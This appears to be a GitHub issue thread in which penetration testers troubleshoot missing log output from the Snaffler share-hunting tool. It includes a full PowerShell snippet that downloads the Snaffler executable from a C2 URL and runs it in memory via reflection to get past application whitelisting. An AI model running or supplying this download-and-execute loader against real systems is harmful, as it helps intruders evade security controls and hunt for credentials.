Snaffler doesn't write log file when executed reflectively

[byt3bl33d3r]

Heya,

I'm on a gig where the client has whitelisting enabled but hasn't locked down powershell. So while I can't run the snaffler executable directly i can just run it reflectively through powershell:

$bytes = IEX (New-Object Net.WebClient).DownloadData("https://myc2url/snaffler.exe")
$asm = [System.Reflection.Assembly]::Load($bytes)
$vars = New-Object System.Collections.Generic.List[System.Object]
$vars.Add("-s")
$vars.Add("-o")
$vars.Add("snaffler.log")
$passed = [string[]]$vars.ToArray()
$asm.EntryPoint.Invoke($null, @(,$passed))

Now snaffler itself works perfectly like this, however for some reason the log file never gets written to disk (even tho I did specify the -o snaffler.log argument).

The arguments seem to be parsed successfully cause if I remove the -s option i don't get any console output.

Is this something you've tried and/or is it a limitation on the Snaffler logger?

Thanks

[S3cur3Th1sSh1t]

I cannot tell if something changed from the output behaviour in the last commits, but this version works fine from Powershell even with output:

https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Snaffler.ps1

[l0ss]

I haven't tried it myself but if i had to guess i'd say something is going squirrely in the way the -o argument is being parsed in your example.

You could test by doing like...

$vars.Add("-s")
$vars.Add("-i")
$vars.Add("C:\")

and see if it successfully understands to snaffle C:. If it doesn't, then i suppose you could try doing $vars.Add("-o snaffler.log") ?

[l0ss]

Closed pending further updates - feel free to ping us again if you can do the above test.

[ville87]

So I had the same issue in an engagement yesterday and the only way I was able to fix this was by first creating a toml file and then running the tool via
$vars.Add("-z")
$vars.Add("c:\temp\config.toml")